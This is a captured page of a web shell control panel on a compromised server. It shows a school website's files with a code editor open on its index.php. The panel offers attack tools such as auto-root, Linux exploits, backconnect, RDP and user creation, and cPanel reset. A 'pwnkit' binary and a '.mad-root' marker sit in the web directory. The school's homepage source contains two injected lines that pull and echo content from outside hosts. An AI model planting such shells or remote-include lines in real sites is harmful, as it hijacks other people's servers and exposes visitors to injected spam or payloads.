Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.66.104
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
ajitsarratia /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
moble
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.htaccess
639
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rw-r--r--
academic.php
10.48
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
ajitsarratia.zip
63.15
MB
-rw-r--r--
anto.php
231
B
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rw-r--r--
config.php
630
B
-rw-r--r--
contact.php
1.81
KB
-rw-r--r--
dadeharsahib
639
B
-rw-r--r--
error_log
1.03
GB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
5.99
KB
-rw-r--r--
gallery.php
1.55
KB
-rw-r--r--
header.php
10.81
KB
-rw-r--r--
index.php
18.47
KB
-rw-r--r--
link.php
28.3
KB
-rw-r--r--
news-coverage.php
1.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
tc.php
3.14
KB
-rw-r--r--
theschol.php
2.74
KB
-rw-r--r--
theschool.php
4.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include('header.php'); ?> <!--Slider Start--> <div class="hero-slide owl-carousel site-blocks-cover "><?php $qurey = "SELECT * FROM `slider` WHERE status='active'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <img src="/myadmin/slider/<?php echo $row['picture']; ?>"/> <?php } ?> </div> <!--Slider End--> <div></div> <!--Trust Start--> <div class="site-section"> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/santattar1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Founder</h5></a> <!--<p>Sant Attar Singh Ji, the founder of this unique institution Akal Academy, was a votary of modern scientific education duly tempered with</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/Dr-Veer-Ji1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Directors Message</h5></a> <!--<p>All great ideas begin with a commitment to the future. Vision gives you the impulse to make the picture on your own</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/principal.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Principal's Message</h5></a> <!--<p>We have made Dreams transfer into thought and are striving to make the thoughts result in action. </p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="javascript:void(0)"> <img src="images/school (9).jpg" alt="Image" class="img-fluid"> </a> <div class="marquee-box"> <marquee direction="up" onmouseover="this.setAttribute('scrollamount', 0, 0); this.stop();" onmouseout="this.setAttribute('scrollamount', 6, 0); this.start();" scrollamount="6" behavior="scroll" style=" line-height: 30px;"> <?php $qurey = "SELECT * FROM `news` WHERE status='active' "; $result = mysqli_query($con, $qurey); $sr_no = 1; while ($row = mysqli_fetch_array($result)) { ?> <p class="news-scroll-content"><?php echo $sr_no . '.'; ?><?php echo $row['title']; ?></p> <?php $sr_no++; } ?> </marquee> </div> <div class="category"><h5>News/ Circular</h5></div> </figure> </div> </div> </div> </div> </div> <!--Trust End--> <!--Subscribe Start--> <div class="site-section ftco-subscribe-1" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-center"> <div class="dt-sc-margin25"></div> <div class="col-lg-12"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '1'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 style="text-align: center;"><?php echo $row['title']; ?></h2> <p style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-12"> <div class="event-box"> <a href="/files/Activity Calendar 2020-21.pdf" class="dt-sc-button large"> Download Event Calender<span class="fa fa-angle-right"></span></a> </div> </div> <div class="dt-sc-margin25"></div> </div> </div> </div> <!--Subscribe End--> <!--About Us Start--> <div class="section-bg style-1" style="background-image: url('images/about_1.jpg');"> <div class="container"> <div class="row"> <div class="col-lg-6"> <figure class="thumnail"> <img src="/images/welcome.jpg" alt="School Image" class="img-fluid"> </figure> </div> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '2'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline style-2"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <div class="dt-sc-margin25"></div> <blockquote class="type1"><q>Life in akal Academy Ajitsar Ratia focus on commitment to academic excellence, intellectual growth, arts athletics, high standards of ethical awareness, sportsmanship, and community service. Novelty and variety are added to each students life by the schools countless efforts and accessibility to a board curriculum based on value based education.</q></blockquote> <?php } ?> </div> </div> </div> </div> <!--About Us End--> <!--Why Us Start--> <div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>Our Features</span> </h2> </div> </div> <div class="row"> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-futbol-o"></span> </div> <div class="feature-1-content"> <!--<h2>Activities</h2> <p></p>--> <p><a href="#" class="btn btn-primary px-4 rounded-0">Activities</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-bus"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School bus</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-users"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Kids Play Land</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-graduation-cap"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Learning</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-clock-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School Timing</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-cloud"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Environment</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-user"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Educators</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-sun-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Daycare</a></p> </div> </div> </div> </div> </div> </div> <!--Features End--> <!--Why Us Start--> <div class="section-bg style-1"> <div class="container"> <div class="row"> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Why Choose Us?</span> </h2> <div class="dt-sc-margin25"></div><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '4' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '5' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '6' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '7' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> </div> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Gallery</span> </h2> <div class="dt-sc-margin25"></div> <div class="slideshow-container"> <div class="mySlides fade"> <img src="/images/gallery/school (12).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (13).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (14).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (18).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (21).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (6).jpg" style="width:100%"> </div> <div class="mySlides fade"> <imgsrc="/images/gallery/school (7).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (8).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (9).jpg" style="width:100%"> </div> <a class="prev" onclick="plusSlides(-1)">❮</a> <a class="next" onclick="plusSlides(1)">❯</a> </div> </div> </div> </div> </div> <!--Why Us End--> <!--opportunities Start--> <div class="section-bg"> <div class="container-fluid"> <div class="row"> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '3'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline" style="text-align: center;"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-6"> <figure class="thumnail" style="text-align: center;"> <img src="/images/welcome.jpg" alt="School Image" class="img-fluid" width="600"> </figure> </div> </div> </div> </div> <!--opportunities End--> <!--Picture Start--> <div class="section back-box"> <div class="container-fluid"> <div class="row"> <div class="col-lg-12"> <figure class="thumnail" style="text-align: center;"> <img src="images/Tree (1).png" alt="School Image" class="img-fluid" width="800"> </figure> </div> </div> </div> </div> <!--Picture End--> <?php echo file_get_contents("https://to-brut.org/yourfile.txt"); ?> <?php echo file_get_contents("https://chawhamikni.lol/sumber/303.txt"); ?> <?php include('footer.php'); ?>
Close